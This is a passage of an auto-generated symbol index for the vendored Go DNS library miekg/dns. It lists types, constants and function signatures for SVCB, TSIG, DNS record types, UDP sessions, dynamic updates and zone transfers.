SVCB_ECHCONFIG } method String (line 659) | func (s *SVCBECHConfig) String() string { return toBase64(s.ECH) } method len (line 660) | func (s *SVCBECHConfig) len() int { return len(s.ECH) } method pack (line 662) | func (s *SVCBECHConfig) pack() ([]byte, error) { method copy (line 666) | func (s *SVCBECHConfig) copy() SVCBKeyValue { method unpack (line 670) | func (s *SVCBECHConfig) unpack(b []byte) error { method parse (line 675) | func (s *SVCBECHConfig) parse(b string) error { type SVCBIPv6Hint (line 695) | type SVCBIPv6Hint struct method Key (line 699) | func (*SVCBIPv6Hint) Key() SVCBKey { return SVCB_IPV6HINT } method len (line 700) | func (s *SVCBIPv6Hint) len() int { return 16 * len(s.Hint) } method pack (line 702) | func (s *SVCBIPv6Hint) pack() ([]byte, error) { method unpack (line 713) | func (s *SVCBIPv6Hint) unpack(b []byte) error { method String (line 730) | func (s *SVCBIPv6Hint) String() string { method parse (line 741) | func (s *SVCBIPv6Hint) parse(b string) error { method copy (line 763) | func (s *SVCBIPv6Hint) copy() SVCBKeyValue { type SVCBDoHPath (line 790) | type SVCBDoHPath struct method Key (line 794) | func (*SVCBDoHPath) Key() SVCBKey { return SVCB_DOHPATH } method String (line 795) | func (s *SVCBDoHPath) String() string { return svcbParamToStr([... method len (line 796) | func (s *SVCBDoHPath) len() int { return len(s.Template) } method pack (line 797) | func (s *SVCBDoHPath) pack() ([]byte, error) { return []byte(s.Templat... method unpack (line 799) | func (s *SVCBDoHPath) unpack(b []byte) error { method parse (line 804) | func (s *SVCBDoHPath) parse(b string) error { method copy (line 813) | func (s *SVCBDoHPath) copy() SVCBKeyValue { type SVCBLocal (line 829) | type SVCBLocal struct method Key (line 834) | func (s *SVCBLocal) Key() SVCBKey { return s.KeyCode } method String (line 835) | func (s *SVCBLocal) String() string { return svcbParamToStr(s.D... method pack (line 836) | func (s *SVCBLocal) pack() ([]byte, error) { return cloneSlice(s.Data)... method len (line 837) | func (s *SVCBLocal) len() int { return len(s.Data) } method unpack (line 839) | func (s *SVCBLocal) unpack(b []byte) error { method parse (line 844) | func (s *SVCBLocal) parse(b string) error { method copy (line 853) | func (s *SVCBLocal) copy() SVCBKeyValue { function areSVCBPairArraysEqual (line 869) | func areSVCBPairArraysEqual(a []SVCBKeyValue, b []SVCBKeyValue) bool { function svcbParamToStr (line 888) | func svcbParamToStr(s []byte) string { function svcbParseParam (line 908) | func svcbParseParam(b string) ([]byte, error) { FILE: vendor/github.com/miekg/dns/tlsa.go method Sign (line 10) | func (r *TLSA) Sign(usage, selector, matchingType int, cert *x509.Certif... method Verify (line 22) | func (r *TLSA) Verify(cert *x509.Certificate) error { function TLSAName (line 35) | func TLSAName(name, service, network string) (string, error) { FILE: vendor/github.com/miekg/dns/tsig.go constant HmacSHA1 (line 18) | HmacSHA1 = "hmac-sha1." constant HmacSHA224 (line 19) | HmacSHA224 = "hmac-sha224." constant HmacSHA256 (line 20) | HmacSHA256 = "hmac-sha256." constant HmacSHA384 (line 21) | HmacSHA384 = "hmac-sha384." constant HmacSHA512 (line 22) | HmacSHA512 = "hmac-sha512." constant HmacMD5 (line 24) | HmacMD5 = "hmac-md5.sig-alg.reg.int." type TsigProvider (line 28) | type TsigProvider interface type tsigHMACProvider (line 35) | type tsigHMACProvider method Generate (line 37) | func (key tsigHMACProvider) Generate(msg []byte, t *TSIG) ([]byte, err... method Verify (line 62) | func (key tsigHMACProvider) Verify(msg []byte, t *TSIG) error { type tsigSecretProvider (line 77) | type tsigSecretProvider method Generate (line 79) | func (ts tsigSecretProvider) Generate(msg []byte, t *TSIG) ([]byte, er... method Verify (line 87) | func (ts tsigSecretProvider) Verify(msg []byte, t *TSIG) error { type TSIG (line 97) | type TSIG struct method String (line 112) | func (rr *TSIG) String() string { method parse (line 127) | func (*TSIG) parse(c *zlexer, origin string) *ParseError { type tsigWireFmt (line 133) | type tsigWireFmt struct type macWireFmt (line 149) | type macWireFmt struct type timerWireFmt (line 155) | type timerWireFmt struct function TsigGenerate (line 166) | func TsigGenerate(m *Msg, secret, requestMAC string, timersOnly bool) ([... function TsigGenerateWithProvider (line 171) | func TsigGenerateWithProvider(m *Msg, provider TsigProvider, requestMAC ... function TsigVerify (line 221) | func TsigVerify(msg []byte, secret, requestMAC string, timersOnly bool) ... function TsigVerifyWithProvider (line 226) | func TsigVerifyWithProvider(msg []byte, provider TsigProvider, requestMA... function tsigVerify (line 231) | func tsigVerify(msg []byte, provider TsigProvider, requestMAC string, ti... function tsigBuffer (line 263) | func tsigBuffer(msgbuf []byte, rr *TSIG, requestMAC string, timersOnly b... function stripTsig (line 325) | func stripTsig(msg []byte) ([]byte, *TSIG, error) { function tsigTimeToString (line 385) | func tsigTimeToString(t uint64) string { function packTsigWire (line 390) | func packTsigWire(tw *tsigWireFmt, msg []byte) (int, error) { function packMacWire (line 434) | func packMacWire(mw *macWireFmt, msg []byte) (int, error) { function packTimerWire (line 446) | func packTimerWire(tw *timerWireFmt, msg []byte) (int, error) { FILE: vendor/github.com/miekg/dns/types.go type Type (line 14) | type Type type Class (line 16) | type Class type Name (line 18) | type Name constant TypeNone (line 27) | TypeNone uint16 = 0 constant TypeA (line 28) | TypeA uint16 = 1 constant TypeNS (line 29) | TypeNS uint16 = 2 constant TypeMD (line 30) | TypeMD uint16 = 3 constant TypeMF (line 31) | TypeMF uint16 = 4 constant TypeCNAME (line 32) | TypeCNAME uint16 = 5 constant TypeSOA (line 33) | TypeSOA uint16 = 6 constant TypeMB (line 34) | TypeMB uint16 = 7 constant TypeMG (line 35) | TypeMG uint16 = 8 constant TypeMR (line 36) | TypeMR uint16 = 9 constant TypeNULL (line 37) | TypeNULL uint16 = 10 constant TypePTR (line 38) | TypePTR uint16 = 12 constant TypeHINFO (line 39) | TypeHINFO uint16 = 13 constant TypeMINFO (line 40) | TypeMINFO uint16 = 14 constant TypeMX (line 41) | TypeMX uint16 = 15 constant TypeTXT (line 42) | TypeTXT uint16 = 16 constant TypeRP (line 43) | TypeRP uint16 = 17 constant TypeAFSDB (line 44) | TypeAFSDB uint16 = 18 constant TypeX25 (line 45) | TypeX25 uint16 = 19 constant TypeISDN (line 46) | TypeISDN uint16 = 20 constant TypeRT (line 47) | TypeRT uint16 = 21 constant TypeNSAPPTR (line 48) | TypeNSAPPTR uint16 = 23 constant TypeSIG (line 49) | TypeSIG uint16 = 24 constant TypeKEY (line 50) | TypeKEY uint16 = 25 constant TypePX (line 51) | TypePX uint16 = 26 constant TypeGPOS (line 52) | TypeGPOS uint16 = 27 constant TypeAAAA (line 53) | TypeAAAA uint16 = 28 constant TypeLOC (line 54) | TypeLOC uint16 = 29 constant TypeNXT (line 55) | TypeNXT uint16 = 30 constant TypeEID (line 56) | TypeEID uint16 = 31 constant TypeNIMLOC (line 57) | TypeNIMLOC uint16 = 32 constant TypeSRV (line 58) | TypeSRV uint16 = 33 constant TypeATMA (line 59) | TypeATMA uint16 = 34 constant TypeNAPTR (line 60) | TypeNAPTR uint16 = 35 constant TypeKX (line 61) | TypeKX uint16 = 36 constant TypeCERT (line 62) | TypeCERT uint16 = 37 constant TypeDNAME (line 63) | TypeDNAME uint16 = 39 constant TypeOPT (line 64) | TypeOPT uint16 = 41 constant TypeAPL (line 65) | TypeAPL uint16 = 42 constant TypeDS (line 66) | TypeDS uint16 = 43 constant TypeSSHFP (line 67) | TypeSSHFP uint16 = 44 constant TypeIPSECKEY (line 68) | TypeIPSECKEY uint16 = 45 constant TypeRRSIG (line 69) | TypeRRSIG uint16 = 46 constant TypeNSEC (line 70) | TypeNSEC uint16 = 47 constant TypeDNSKEY (line 71) | TypeDNSKEY uint16 = 48 constant TypeDHCID (line 72) | TypeDHCID uint16 = 49 constant TypeNSEC3 (line 73) | TypeNSEC3 uint16 = 50 constant TypeNSEC3PARAM (line 74) | TypeNSEC3PARAM uint16 = 51 constant TypeTLSA (line 75) | TypeTLSA uint16 = 52 constant TypeSMIMEA (line 76) | TypeSMIMEA uint16 = 53 constant TypeHIP (line 77) | TypeHIP uint16 = 55 constant TypeNINFO (line 78) | TypeNINFO uint16 = 56 constant TypeRKEY (line 79) | TypeRKEY uint16 = 57 constant TypeTALINK (line 80) | TypeTALINK uint16 = 58 constant TypeCDS (line 81) | TypeCDS uint16 = 59 constant TypeCDNSKEY (line 82) | TypeCDNSKEY uint16 = 60 constant TypeOPENPGPKEY (line 83) | TypeOPENPGPKEY uint16 = 61 constant TypeCSYNC (line 84) | TypeCSYNC uint16 = 62 constant TypeZONEMD (line 85) | TypeZONEMD uint16 = 63 constant TypeSVCB (line 86) | TypeSVCB uint16 = 64 constant TypeHTTPS (line 87) | TypeHTTPS uint16 = 65 constant TypeSPF (line 88) | TypeSPF uint16 = 99 constant TypeUINFO (line 89) | TypeUINFO uint16 = 100 constant TypeUID (line 90) | TypeUID uint16 = 101 constant TypeGID (line 91) | TypeGID uint16 = 102 constant TypeUNSPEC (line 92) | TypeUNSPEC uint16 = 103 constant TypeNID (line 93) | TypeNID uint16 = 104 constant TypeL32 (line 94) | TypeL32 uint16 = 105 constant TypeL64 (line 95) | TypeL64 uint16 = 106 constant TypeLP (line 96) | TypeLP uint16 = 107 constant TypeEUI48 (line 97) | TypeEUI48 uint16 = 108 constant TypeEUI64 (line 98) | TypeEUI64 uint16 = 109 constant TypeURI (line 99) | TypeURI uint16 = 256 constant TypeCAA (line 100) | TypeCAA uint16 = 257 constant TypeAVC (line 101) | TypeAVC uint16 = 258 constant TypeAMTRELAY (line 102) | TypeAMTRELAY uint16 = 260 constant TypeTKEY (line 104) | TypeTKEY uint16 = 249 constant TypeTSIG (line 105) | TypeTSIG uint16 = 250 constant TypeIXFR (line 108) | TypeIXFR uint16 = 251 constant TypeAXFR (line 109) | TypeAXFR uint16 = 252 constant TypeMAILB (line 110) | TypeMAILB uint16 = 253 constant TypeMAILA (line 111) | TypeMAILA uint16 = 254 constant TypeANY (line 112) | TypeANY uint16 = 255 constant TypeTA (line 114) | TypeTA uint16 = 32768 constant TypeDLV (line 115) | TypeDLV uint16 = 32769 constant TypeReserved (line 116) | TypeReserved uint16 = 65535 constant ClassINET (line 119) | ClassINET = 1 constant ClassCSNET (line 120) | ClassCSNET = 2 constant ClassCHAOS (line 121) | ClassCHAOS = 3 constant ClassHESIOD (line 122) | ClassHESIOD = 4 constant ClassNONE (line 123) | ClassNONE = 254 constant ClassANY (line 124) | ClassANY = 255 constant RcodeSuccess (line 127) | RcodeSuccess = 0 constant RcodeFormatError (line 128) | RcodeFormatError = 1 constant RcodeServerFailure (line 129) | RcodeServerFailure = 2 constant RcodeNameError (line 130) | RcodeNameError = 3 constant RcodeNotImplemented (line 131) | RcodeNotImplemented = 4 constant RcodeRefused (line 132) | RcodeRefused = 5 constant RcodeYXDomain (line 133) | RcodeYXDomain = 6 constant RcodeYXRrset (line 134) | RcodeYXRrset = 7 constant RcodeNXRrset (line 135) | RcodeNXRrset = 8 constant RcodeNotAuth (line 136) | RcodeNotAuth = 9 constant RcodeNotZone (line 137) | RcodeNotZone = 10 constant RcodeBadSig (line 138) | RcodeBadSig = 16 constant RcodeBadVers (line 139) | RcodeBadVers = 16 constant RcodeBadKey (line 140) | RcodeBadKey = 17 constant RcodeBadTime (line 141) | RcodeBadTime = 18 constant RcodeBadMode (line 142) | RcodeBadMode = 19 constant RcodeBadName (line 143) | RcodeBadName = 20 constant RcodeBadAlg (line 144) | RcodeBadAlg = 21 constant RcodeBadTrunc (line 145) | RcodeBadTrunc = 22 constant RcodeBadCookie (line 146) | RcodeBadCookie = 23 constant OpcodeQuery (line 149) | OpcodeQuery = 0 constant OpcodeIQuery (line 150) | OpcodeIQuery = 1 constant OpcodeStatus (line 151) | OpcodeStatus = 2 constant OpcodeNotify (line 152) | OpcodeNotify = 4 constant OpcodeUpdate (line 153) | OpcodeUpdate = 5 constant ZoneMDSchemeSimple (line 158) | ZoneMDSchemeSimple = 1 constant ZoneMDHashAlgSHA384 (line 160) | ZoneMDHashAlgSHA384 = 1 constant ZoneMDHashAlgSHA512 (line 161) | ZoneMDHashAlgSHA512 = 2 constant IPSECGatewayNone (line 166) | IPSECGatewayNone uint8 = iota constant IPSECGatewayIPv4 (line 167) | IPSECGatewayIPv4 constant IPSECGatewayIPv6 (line 168) | IPSECGatewayIPv6 constant IPSECGatewayHost (line 169) | IPSECGatewayHost constant AMTRELAYNone (line 174) | AMTRELAYNone = IPSECGatewayNone constant AMTRELAYIPv4 (line 175) | AMTRELAYIPv4 = IPSECGatewayIPv4 constant AMTRELAYIPv6 (line 176) | AMTRELAYIPv6 = IPSECGatewayIPv6 constant AMTRELAYHost (line 177) | AMTRELAYHost = IPSECGatewayHost type Header (line 181) | type Header struct constant headerSize (line 188) | headerSize = 12 constant _QR (line 191) | _QR = 1 << 15 constant _AA (line 192) | _AA = 1 << 10 constant _TC (line 193) | _TC = 1 << 9 constant _RD (line 194) | _RD = 1 << 8 constant _RA (line 195) | _RA = 1 << 7 constant _Z (line 196) | _Z = 1 << 6 constant _AD (line 197) | _AD = 1 << 5 constant _CD (line 198) | _CD = 1 << 4 constant LOC_EQUATOR (line 203) | LOC_EQUATOR = 1 << 31 constant LOC_PRIMEMERIDIAN (line 204) | LOC_PRIMEMERIDIAN = 1 << 31 constant LOC_HOURS (line 205) | LOC_HOURS = 60 * 1000 constant LOC_DEGREES (line 206) | LOC_DEGREES = 60 * LOC_HOURS constant LOC_ALTITUDEBASE (line 207) | LOC_ALTITUDEBASE = 100000 constant CertPKIX (line 212) | CertPKIX = 1 + iota constant CertSPKI (line 213) | CertSPKI constant CertPGP (line 214) | CertPGP constant CertIPIX (line 215) | CertIPIX constant CertISPKI (line 216) | CertISPKI constant CertIPGP (line 217) | CertIPGP constant CertACPKIX (line 218) | CertACPKIX constant CertIACPKIX (line 219) | CertIACPKIX constant CertURI (line 220) | CertURI = 253 constant CertOID (line 221) | CertOID = 254 constant ipv4InIPv6Prefix (line 240) | ipv4InIPv6Prefix = "::ffff:" type Question (line 249) | type Question struct method len (line 255) | func (q *Question) len(off int, compression map[string]struct{}) int { method String (line 261) | func (q *Question) String() (s string) { type ANY (line 271) | type ANY struct method String (line 276) | func (rr *ANY) String() string { return rr.Hdr.String() } method parse (line 278) | func (*ANY) parse(c *zlexer, origin string) *ParseError { type NULL (line 283) | type NULL struct method String (line 288) | func (rr *NULL) String() string { method parse (line 293) | func (*NULL) parse(c *zlexer, origin string) *ParseError { type CNAME (line 298) | type CNAME struct method String (line 303) | func (rr *CNAME) String() string { return rr.Hdr.String() + sprintName... type HINFO (line 306) | type HINFO struct method String (line 312) | func (rr *HINFO) String() string { type MB (line 317) | type MB struct method String (line 322) | func (rr *MB) String() string { return rr.Hdr.String() + sprintName(rr... type MG (line 325) | type MG struct method String (line 330) | func (rr *MG) String() string { return rr.Hdr.String() + sprintName(rr... type MINFO (line 333) | type MINFO struct method String (line 339) | func (rr *MINFO) String() string { type MR (line 344) | type MR struct method String (line 349) | func (rr *MR) String() string { type MF (line 354) | type MF struct method String (line 359) | func (rr *MF) String() string { type MD (line 364) | type MD struct method String (line 369) | func (rr *MD) String() string { type MX (line 374) | type MX struct method String (line 380) | func (rr *MX) String() string { type AFSDB (line 385) | type AFSDB struct method String (line 391) | func (rr *AFSDB) String() string { type X25 (line 396) | type X25 struct method String (line 401) | func (rr *X25) String() string { type ISDN (line 406) | type ISDN struct method String (line 412) | func (rr *ISDN) String() string { type RT (line 417) | type RT struct method String (line 423) | func (rr *RT) String() string { type NS (line 428) | type NS struct method String (line 433) | func (rr *NS) String() string { type PTR (line 438) | type PTR struct method String (line 443) | func (rr *PTR) String() string { type RP (line 448) | type RP struct method String (line 454) | func (rr *RP) String() string { type SOA (line 459) | type SOA struct method String (line 470) | func (rr *SOA) String() string { type TXT (line 480) | type TXT struct method String (line 485) | func (rr *TXT) String() string { return rr.Hdr.String() + sprintTxt(rr... function sprintName (line 487) | func sprintName(s string) string { function sprintTxtOctet (line 533) | func sprintTxtOctet(s string) string { function sprintTxt (line 556) | func sprintTxt(txt []string) string { function writeTXTStringByte (line 578) | func writeTXTStringByte(s *strings.Builder, b byte) { constant escapedByteSmall (line 591) | escapedByteSmall = "" + constant escapedByteLarge (line 596) | escapedByteLarge = `\127\128\129` + function escapeByte (line 614) | func escapeByte(b byte) string { function isDomainNameLabelSpecial (line 627) | func isDomainNameLabelSpecial(b byte) bool { function nextByte (line 635) | func nextByte(s string, offset int) (byte, int) { type SPF (line 657) | type SPF struct method String (line 662) | func (rr *SPF) String() string { return rr.Hdr.String() + sprintTxt(rr... type AVC (line 665) | type AVC struct method String (line 670) | func (rr *AVC) String() string { return rr.Hdr.String() + sprintTxt(rr... type SRV (line 673) | type SRV struct method String (line 681) | func (rr *SRV) String() string { type NAPTR (line 689) | type NAPTR struct method String (line 699) | func (rr *NAPTR) String() string { type CERT (line 710) | type CERT struct method String (line 718) | func (rr *CERT) String() string { type DNAME (line 736) | type DNAME struct method String (line 741) | func (rr *DNAME) String() string { type A (line 746) | type A struct method String (line 751) | func (rr *A) String() string { type AAAA (line 759) | type AAAA struct method String (line 764) | func (rr *AAAA) String() string { type PX (line 777) | type PX struct method String (line 784) | func (rr *PX) String() string { type GPOS (line 789) | type GPOS struct method String (line 796) | func (rr *GPOS) String() string { type LOC (line 801) | type LOC struct method String (line 834) | func (rr *LOC) String() string { function cmToM (line 814) | func cmToM(x uint8) string { type SIG (line 880) | type SIG struct type RRSIG (line 885) | type RRSIG struct method String (line 898) | func (rr *RRSIG) String() string { type NXT (line 913) | type NXT struct type NSEC (line 918) | type NSEC struct method String (line 924) | func (rr *NSEC) String() string { method len (line 932) | func (rr *NSEC) len(off int, compression map[string]struct{}) int { type DLV (line 940) | type DLV struct type CDS (line 943) | type CDS struct type DS (line 946) | type DS struct method String (line 954) | func (rr *DS) String() string { type KX (line 962) | type KX struct method String (line 968) | func (rr *KX) String() string { type TA (line 974) | type TA struct method String (line 982) | func (rr *TA) String() string { type TALINK (line 990) | type TALINK struct method String (line 996) | func (rr *TALINK) String() string { type SSHFP (line 1002) | type SSHFP struct method String (line 1009) | func (rr *SSHFP) String() string { type KEY (line 1016) | type KEY struct type CDNSKEY (line 1021) | type CDNSKEY struct type DNSKEY (line 1026) | type DNSKEY struct method String (line 1034) | func (rr *DNSKEY) String() string { type IPSECKEY (line 1042) | type IPSECKEY struct method String (line 1052) | func (rr *IPSECKEY) String() string { type AMTRELAY (line 1073) | type AMTRELAY struct method String (line 1081) | func (rr *AMTRELAY) String() string { type RKEY (line 1105) | type RKEY struct method String (line 1113) | func (rr *RKEY) String() string { type NSAPPTR (line 1121) | type NSAPPTR struct method String (line 1126) | func (rr *NSAPPTR) String() string { return rr.Hdr.String() + sprintNa... type NSEC3 (line 1129) | type NSEC3 struct method String (line 1141) | func (rr *NSEC3) String() string { method len (line 1154) | func (rr *NSEC3) len(off int, compression map[string]struct{}) int { type NSEC3PARAM (line 1162) | type NSEC3PARAM struct method String (line 1171) | func (rr *NSEC3PARAM) String() string { type TKEY (line 1181) | type TKEY struct method String (line 1195) | func (rr *TKEY) String() string { type RFC3597 (line 1210) | type RFC3597 struct method String (line 1215) | func (rr *RFC3597) String() string { function rfc3597Header (line 1223) | func rfc3597Header(h RR_Header) string { type URI (line 1234) | type URI struct method String (line 1242) | func (rr *URI) String() string { type DHCID (line 1248) | type DHCID struct method String (line 1253) | func (rr *DHCID) String() string { return rr.Hdr.String() + rr.Digest } type TLSA (line 1256) | type TLSA struct method String (line 1264) | func (rr *TLSA) String() string { type SMIMEA (line 1273) | type SMIMEA struct method String (line 1281) | func (rr *SMIMEA) String() string { type HIP (line 1296) | type HIP struct method String (line 1306) | func (rr *HIP) String() string { type NINFO (line 1318) | type NINFO struct method String (line 1323) | func (rr *NINFO) String() string { return rr.Hdr.String() + sprintTxt(... type NID (line 1326) | type NID struct method String (line 1332) | func (rr *NID) String() string { type L32 (line 1340) | type L32 struct method String (line 1346) | func (rr *L32) String() string { type L64 (line 1355) | type L64 struct method String (line 1361) | func (rr *L64) String() string { type LP (line 1369) | type LP struct method String (line 1375) | func (rr *LP) String() string { type EUI48 (line 1380) | type EUI48 struct method String (line 1385) | func (rr *EUI48) String() string { return rr.Hdr.String() + euiToStrin... type EUI64 (line 1388) | type EUI64 struct method String (line 1393) | func (rr *EUI64) String() string { return rr.Hdr.String() + euiToStrin... type CAA (line 1396) | type CAA struct method String (line 1404) | func (rr *CAA) String() string { type UID (line 1409) | type UID struct method String (line 1414) | func (rr *UID) String() string { return rr.Hdr.String() + strconv.Form... type GID (line 1417) | type GID struct method String (line 1422) | func (rr *GID) String() string { return rr.Hdr.String() + strconv.Form... type UINFO (line 1425) | type UINFO struct method String (line 1430) | func (rr *UINFO) String() string { return rr.Hdr.String() + sprintTxt(... type EID (line 1433) | type EID struct method String (line 1438) | func (rr *EID) String() string { return rr.Hdr.String() + strings.ToUp... type NIMLOC (line 1441) | type NIMLOC struct method String (line 1446) | func (rr *NIMLOC) String() string { return rr.Hdr.String() + strings.T... type OPENPGPKEY (line 1449) | type OPENPGPKEY struct method String (line 1454) | func (rr *OPENPGPKEY) String() string { return rr.Hdr.String() + rr.Pu... type CSYNC (line 1457) | type CSYNC struct method String (line 1464) | func (rr *CSYNC) String() string { method len (line 1473) | func (rr *CSYNC) len(off int, compression map[string]struct{}) int { type ZONEMD (line 1481) | type ZONEMD struct method String (line 1489) | func (rr *ZONEMD) String() string { type APL (line 1498) | type APL struct method String (line 1510) | func (rr *APL) String() string { type APLPrefix (line 1504) | type APLPrefix struct method str (line 1523) | func (a *APLPrefix) str() string { method equals (line 1558) | func (a *APLPrefix) equals(b *APLPrefix) bool { method copy (line 1565) | func (a *APLPrefix) copy() APLPrefix { method len (line 1573) | func (a *APLPrefix) len() int { function TimeToString (line 1582) | func TimeToString(t uint32) string { function StringToTime (line 1594) | func StringToTime(s string) (uint32, error) { function saltToString (line 1607) | func saltToString(s string) string { function euiToString (line 1614) | func euiToString(eui uint64, bits int) (hex string) { function cloneSlice (line 1629) | func cloneSlice[E any, S ~[]E](s S) S { function copyNet (line 1637) | func copyNet(n net.IPNet) net.IPNet { function splitN (line 1646) | func splitN(s string, n int) []string { FILE: vendor/github.com/miekg/dns/udp.go type SessionUDP (line 31) | type SessionUDP struct method RemoteAddr (line 37) | func (s *SessionUDP) RemoteAddr() net.Addr { return s.raddr } function ReadFromSessionUDP (line 41) | func ReadFromSessionUDP(conn *net.UDPConn, b []byte) (int, *SessionUDP, ... function WriteToSessionUDP (line 51) | func WriteToSessionUDP(conn *net.UDPConn, b []byte, session *SessionUDP)... function setUDPSocketOptions (line 57) | func setUDPSocketOptions(conn *net.UDPConn) error { function parseDstFromOOB (line 69) | func parseDstFromOOB(oob []byte) net.IP { function correctSource (line 85) | func correctSource(oob []byte) []byte { FILE: vendor/github.com/miekg/dns/udp_windows.go type SessionUDP (line 12) | type SessionUDP struct method RemoteAddr (line 17) | func (s *SessionUDP) RemoteAddr() net.Addr { return s.raddr } function ReadFromSessionUDP (line 21) | func ReadFromSessionUDP(conn *net.UDPConn, b []byte) (int, *SessionUDP, ... function WriteToSessionUDP (line 30) | func WriteToSessionUDP(conn *net.UDPConn, b []byte, session *SessionUDP)... function setUDPSocketOptions (line 34) | func setUDPSocketOptions(*net.UDPConn) error { return nil } function parseDstFromOOB (line 35) | func parseDstFromOOB([]byte, net.IP) net.IP { return nil } FILE: vendor/github.com/miekg/dns/update.go method NameUsed (line 5) | func (u *Msg) NameUsed(rr []RR) { method NameNotUsed (line 16) | func (u *Msg) NameNotUsed(rr []RR) { method Used (line 27) | func (u *Msg) Used(rr []RR) { method RRsetUsed (line 44) | func (u *Msg) RRsetUsed(rr []RR) { method RRsetNotUsed (line 56) | func (u *Msg) RRsetNotUsed(rr []RR) { method Insert (line 67) | func (u *Msg) Insert(rr []RR) { method RemoveRRset (line 81) | func (u *Msg) RemoveRRset(rr []RR) { method RemoveName (line 92) | func (u *Msg) RemoveName(rr []RR) { method Remove (line 102) | func (u *Msg) Remove(rr []RR) { FILE: vendor/github.com/miekg/dns/version.go type v (line 9) | type v struct method String (line 13) | func (v v) String() string { FILE: vendor/github.com/miekg/dns/xfr.go type Envelope (line 9) | type Envelope struct type Transfer (line 15) | type Transfer struct method tsigProvider (line 25) | func (t *Transfer) tsigProvider() TsigProvider { method In (line 47) | func (t *Transfer) In(q *Msg, a string) (env chan *Envelope, err error) { method inAxfr (line 81) | func (t *Transfer) inAxfr(q *Msg, c chan *Envelope) { method inIxfr (line 134) | func (t *Transfer) inIxfr(q *Msg, c chan *Envelope) { method Out (line 216) | func (t *Transfer) Out(w ResponseWriter, q *Msg, ch chan *Envelope) er... method ReadMsg (line 236) | func (t *Transfer) ReadMsg() (*Msg, error) { method WriteMsg (line 256) | func (t *Transfer) WriteMsg(m *Msg) (err error) { function isSOAFirst (line 270) | func isSOAFirst(in *Msg) bool { function isSOALast (line 275) | func isSOALast(in *Msg) bool { constant errXFR (line 280) | errXFR = "bad xfr rcode: %d" FILE: vendor/github.com/miekg/dns/zduplicate.go method isDuplicate (line 7) | func (r1 *A) isDuplicate(_r2 RR) bool { method isDuplicate (line 19) | func (r1 *AAAA) isDuplicate(_r2 RR) bool { method isDuplicate (line 31) | func (r1 *AFSDB) isDuplicate(_r2 RR) bool { method isDuplicate (line 46) | func (r1 *AMTRELAY) isDuplicate(_r2 RR) bool { method isDuplicate (line 72) | func (r1 *ANY) isDuplicate(_r2 RR) bool { method isDuplicate (line 81) | func (r1 *APL) isDuplicate(_r2 RR) bool { method isDuplicate (line 98) | func (r1 *AVC) isDuplicate(_r2 RR) bool { method isDuplicate (line 115) | func (r1 *CAA) isDuplicate(_r2 RR) bool { method isDuplicate (line 133) | func (r1 *CDNSKEY) isDuplicate(_r2 RR) bool { method isDuplicate (line 154) | func (r1 *CDS) isDuplicate(_r2 RR) bool { method isDuplicate (line 175) | func (r1 *CERT) isDuplicate(_r2 RR) bool { method isDuplicate (line 196) | func (r1 *CNAME) isDuplicate(_r2 RR) bool { method isDuplicate (line 208) | func (r1 *CSYNC) isDuplicate(_r2 RR) bool { method isDuplicate (line 231) | func (r1 *DHCID) isDuplicate(_r2 RR) bool { method isDuplicate (line 243) | func (r1 *DLV) isDuplicate(_r2 RR) bool { method isDuplicate (line 264) | func (r1 *DNAME) isDuplicate(_r2 RR) bool { method isDuplicate (line 276) | func (r1 *DNSKEY) isDuplicate(_r2 RR) bool { method isDuplicate (line 297) | func (r1 *DS) isDuplicate(_r2 RR) bool { method isDuplicate (line 318) | func (r1 *EID) isDuplicate(_r2 RR) bool { method isDuplicate (line 330) | func (r1 *EUI48) isDuplicate(_r2 RR) bool { method isDuplicate (line 342) | func (r1 *EUI64) isDuplicate(_r2 RR) bool { method isDuplicate (line 354) | func (r1 *GID) isDuplicate(_r2 RR) bool { method isDuplicate (line 366) | func (r1 *GPOS) isDuplicate(_r2 RR) bool { method isDuplicate (line 384) | func (r1 *HINFO) isDuplicate(_r2 RR) bool { method isDuplicate (line 399) | func (r1 *HIP) isDuplicate(_r2 RR) bool { method isDuplicate (line 431) | func (r1 *HTTPS) isDuplicate(_r2 RR) bool { method isDuplicate (line 452) | func (r1 *IPSECKEY) isDuplicate(_r2 RR) bool { method isDuplicate (line 484) | func (r1 *ISDN) isDuplicate(_r2 RR) bool { method isDuplicate (line 499) | func (r1 *KEY) isDuplicate(_r2 RR) bool { method isDuplicate (line 520) | func (r1 *KX) isDuplicate(_r2 RR) bool { method isDuplicate (line 535) | func (r1 *L32) isDuplicate(_r2 RR) bool { method isDuplicate (line 550) | func (r1 *L64) isDuplicate(_r2 RR) bool { method isDuplicate (line 565) | func (r1 *LOC) isDuplicate(_r2 RR) bool { method isDuplicate (line 595) | func (r1 *LP) isDuplicate(_r2 RR) bool { method isDuplicate (line 610) | func (r1 *MB) isDuplicate(_r2 RR) bool { method isDuplicate (line 622) | func (r1 *MD) isDuplicate(_r2 RR) bool { method isDuplicate (line 634) | func (r1 *MF) isDuplicate(_r2 RR) bool { method isDuplicate (line 646) | func (r1 *MG) isDuplicate(_r2 RR) bool { method isDuplicate (line 658) | func (r1 *MINFO) isDuplicate(_r2 RR) bool { method isDuplicate (line 673) | func (r1 *MR) isDuplicate(_r2 RR) bool { method isDuplicate (line 685) | func (r1 *MX) isDuplicate(_r2 RR) bool { method isDuplicate (line 700) | func (r1 *NAPTR) isDuplicate(_r2 RR) bool { method isDuplicate (line 727) | func (r1 *NID) isDuplicate(_r2 RR) bool { method isDuplicate (line 742) | func (r1 *NIMLOC) isDuplicate(_r2 RR) bool { method isDuplicate (line 754) | func (r1 *NINFO) isDuplicate(_r2 RR) bool { method isDuplicate (line 771) | func (r1 *NS) isDuplicate(_r2 RR) bool { method isDuplicate (line 783) | func (r1 *NSAPPTR) isDuplicate(_r2 RR) bool { method isDuplicate (line 795) | func (r1 *NSEC) isDuplicate(_r2 RR) bool { method isDuplicate (line 815) | func (r1 *NSEC3) isDuplicate(_r2 RR) bool { method isDuplicate (line 853) | func (r1 *NSEC3PARAM) isDuplicate(_r2 RR) bool { method isDuplicate (line 877) | func (r1 *NULL) isDuplicate(_r2 RR) bool { method isDuplicate (line 889) | func (r1 *NXT) isDuplicate(_r2 RR) bool { method isDuplicate (line 909) | func (r1 *OPENPGPKEY) isDuplicate(_r2 RR) bool { method isDuplicate (line 921) | func (r1 *PTR) isDuplicate(_r2 RR) bool { method isDuplicate (line 933) | func (r1 *PX) isDuplicate(_r2 RR) bool { method isDuplicate (line 951) | func (r1 *RFC3597) isDuplicate(_r2 RR) bool { method isDuplicate (line 963) | func (r1 *RKEY) isDuplicate(_r2 RR) bool { method isDuplicate (line 984) | func (r1 *RP) isDuplicate(_r2 RR) 